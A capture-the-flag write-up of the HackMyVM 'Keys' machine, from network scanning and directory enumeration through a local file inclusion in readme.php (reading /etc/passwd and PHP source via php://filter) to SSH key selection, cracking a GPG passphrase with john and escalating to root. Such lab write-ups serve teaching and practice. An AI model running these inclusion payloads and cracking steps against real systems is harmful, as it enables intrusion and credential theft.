HackMyVM - Keys - Writeup

Note

Big thank you to avijneyam for creating a nice challenge machine!

I have obfuscated some of the results below to not spoil it too much as it is a really nice VM.

(typically with  ****** or xxxxx if it is in a file path!)

https://hackmyvm.eu/machines/machine.php?vm=Keys

Feel free to comment and tell me what I missed and got wrong or post your own writeup so myself and others can improve their skills too.

Identify the target

┌──(kali㉿kali)-[~/keys]

└─$ nmap -sP 10.0.0.0/24

Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 18:26 EDT

Nmap scan report for 10.0.0.10

Host is up (0.000097s latency).

Nmap scan report for 10.0.0.20

Host is up (0.00053s latency).

Nmap done: 2 IP addresses (2 hosts up) scanned in 0.20 seconds

Target is 10.0.0.20
Attacking from a mostly vanilla Kali under VirtualBox 10.0.0.10.

Scan for ports

└─$ nmap -T4 -p- -sC -sV -oN nmap.log 10.0.0.20 

Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 18:32 EDT

Nmap scan report for 10.0.0.20

Host is up (0.00067s latency).

Not shown: 65533 closed ports

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)

| ssh-hostkey: 

|   3072 6e:b1:d1:09:f5:dc:01:29:ed:9d:4f:8e:a7:7a:a0:a6 (RSA)

|   256 35:f4:29:df:64:6a:be:7f:9f:0a:9f:ee:07:e4:19:07 (ECDSA)

|_  256 4e:0f:f7:32:cc:c7:91:57:07:d9:50:0a:38:c9:e5:11 (ED25519)

80/tcp open  http    nginx 1.18.0

|_http-server-header: nginx/1.18.0

|_http-title: The World of Keys

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan the webservice

└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -r -u http://10.0.0.20 -x html,php,txt,jpg -o dir-medium.txt --no-error 

===============================================================

Gobuster v3.1.0

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url:                     http://10.0.0.20

[+] Method:                  GET

[+] Threads:                 10

[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

[+] Negative Status codes:   404

[+] User Agent:              gobuster/3.1.0

[+] Extensions:              txt,jpg,html,php

[+] Follow Redirect:         true

[+] Timeout:                 10s

===============================================================

2021/11/02 18:44:47 Starting gobuster in directory enumeration mode

===============================================================

/index.html           (Status: 200) [Size: 135]

/readme.php           (Status: 200) [Size: 398]

 

Fetch /readme.php

curl http://10.0.0.20/readme.php 

the page contains:

<!-- Here is a Gift for you Ayr43KwSdwpWQw6HFce8SaMmpWH12XsUF -->

https://www.dcode.fr/base-58-cipher this decodes to "my_personal_wordlist.txt"

gives us the URL for a custom wordlist.
Scanning for other files returns no results so lets check for querystrings on the readme.php page.

└─$ wfuzz -c -z file,my_personal_wordlist.txt --hh BBB  http://10.0.0.20/readme.php?FUZZ{test}=../../../../../etc/passwd

********************************************************

* Wfuzz 3.1.0 - The Web Fuzzer                         *

********************************************************

Target: http://10.0.0.20/readme.php?FUZZ=../../../../../etc/passwd

Total requests: 99900

=====================================================================

ID           Response   Lines    Word       Chars       Payload        

=====================================================================

000000001:   200        24 L     45 W       398 Ch      "test"         

000084829:   200        54 L     89 W       2004 Ch     "***y"         

Total time: 0

Processed Requests: 99901

Filtered Requests: 99899

Having a look around the file system identifies the user accounts from /etc/passwd

root:x:0:0:root:/root:/bin/bash

steve:x:1000:1000:steve,,,:/home/steve:/bin/bash

jack:x:1001:1001::/home/jack:/bin/bash

rachel:x:1002:1002::/home/rachel:/bin/bash

useless:x:1003:1003::/home/useless:/bin/bash

reading the readme.php file to see what commands it is using to check how to better exploit it

(had to base64 encode it to prevent recursion)

└─$ curl http://10.0.0.20/readme.php?***y=php://filter/convert.base64-encode/resource=readme.php

Decoding the base64 gave an interesting comment in the code:

<?php
   include($_GET['34sy']);
   // The World of Keys are Here yCQlSq/+(Uq/+****
   // I Love Z85 (ZeroMQ) :)
   // one more gift for you :) id_rsa.zip
?>

https://cryptii.com/pipes/z85-encoder

yCQlSq/+(Uq/+**** decodes to k3ys********

And we are also given another new file: id_rsa.zip
Downloading the zip file provides us with 32,768 private and public key pairs... :(

Fetching the new folder:

wget -r http://10.0.0.20/k3ys......

That gives us 9,999 files in the format id_rsa-nnnn
I noticed that the first couple of files were identical so I thought I would compare them to find any that were different

checkkeys.sh

KEYS=k3ys......

echo Check Keys

for i in $(ls -1 $KEYS); do

if ! diff -q $KEYS/id_rsa-0001 $KEYS/$i; then

echo $i

fi

done

└─$ sh ./checkkey.sh

Check Keys

Files k3ys....../id_rsa-0001 and k3ys....../id_rsa-***5 differ

id_rsa-***5

 

The difference was just a note saying I had found it, but I now have a 4 digit number so that should point to the certificate to use from the zip file. (yes i have hidden the number!)

└─$ cp id_rsa/2048/private/*-XXX5 ./foundthekey

                                                                                

┌──(kali㉿kali)-[~/keys]

└

Using the usernames found earlier and a little trial end error we get a user shell

┌──(kali㉿kali)-[~/keys]

└─$ ssh steve@10.0.0.20 -i ./foundthekey       

Linux keys 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;

[ useless:user ] the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Last login: Wed Nov  3 00:04:46 2021 from 10.0.0.10

steve@keys:~$ cat u__s__e__r.txt 

***************VDll6

steve@keys:~$ 

This time it was not me that obfuscated the user flag, there are only the last 5 chars so it will need root or other access to get the full user key.

Root privilege escalation

I had a good look around and scanned with linpeas without finding too much to help me but there are some interesting files, including a python script in /opt that didnt appear to give me any extra information.

There is however an encrypted message in the home directory

steve@keys:~$ cat .important_message.asc 

-----BEGIN PGP MESSAGE-----

Version: BCPG C# v1.6.1.0

hQEMA6B1gxpXS1ctAQf+PTWuk5+Mi6VGX3GOTNBe0S9Yci4pAOvOng+ORZLW/Q2m

A3ckvwiPlAWZiu7J2/TXjhRautusiXhYRb/8oX+JsXJ/2VZu8YEJGgWuySewxYm5

r8L0IPlKOaJLLsf6Vl4EtwTgXo7Zms8xNB8PyUwmEkkLvyFGFC/wNIf7sJZ31U/Z

5iRooTYPAfwLXsc/0sQ7VeeQT++t6547QwTiw9fpKFblwzjypJfIioNWCnoLpfA5

6xnBkkYPpr0w1zItzSBw5FHQKM0mYuf1WdAyfJ6zUytcqeSTZMN0qYkkmJfKN580

aD84m0juc4bJJVF+5pDuduc1j5Va73Lxx46P9TNVhMlBTCDy7uOPAtvrqnqLeYHH

1zhi/OqeFoS59ASvjWsfyur+wRAv6uIMuywIxD7usKIsRko6JkNN//ngcbBCudzX

RA4=

=voUx

-----END PGP MESSAGE-----

steve@keys:~$

The user also has a gpg key in /var/mail/private_key.gpg but this is secured with a passphrase.

After copying the file to kali we can use 'john' to find it.

└─$ gpg2john private_key.gpg > johnkey

└─$ john  --wordlist=/home/kali/rockyou.txt johnkey 

└─$ john --show  johnkey                                                    1 ⨯

root@keys.com:y******t:::root@keys.com::private_key.gpg

1 password hash cracked, 0 left

Now we have the passphrase we can just import the key into the keystore in steve@keys using the passphrase and then decrypt the messsage with it. 

steve@keys:/var/mail$ gpg --import private_key.gpg 

gpg: key A075831A574B572D: "root@keys.com" not changed

gpg: key A075831A574B572D: secret key imported

gpg: Total number processed: 1

gpg:              unchanged: 1

gpg:       secret keys read: 1

gpg:   secret keys imported: 1

steve@keys:~$ gpg --output important_message.txt --decrypt .important_message.asc 

gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences

gpg: encrypted with 2048-bit RSA key, ID A075831A574B572D, created 2021-10-28

      "root@keys.com"

gpg: WARNING: message was not integrity protected

gpg: Hint: If this message was created before the year 2003 it is

     likely that this message is legitimate.  This is because back

     then integrity protection was not widely used.

gpg: Use the option '--ignore-mdc-error' to decrypt anyway.

gpg: decryption forced to fail!

steve@keys:~$ cat important_message.txt 

Root Password is th3************3steve@keys:~$ 

steve@keys:~$ su

Password: 

root@keys:/home/steve# cd

root@keys:~# ls

ro0ot.txt

root@keys:~# 

The message gave us the root password and having root it is a trivial task to fetch the other parts of the flag from the various user directories.

References

https://hackmyvm.eu/machines/machine.php?vm=Keys

https://cryptii.com/pipes/z85-encoder

https://www.dcode.fr/base-58-cipher

https://www.dcode.fr/code-base-64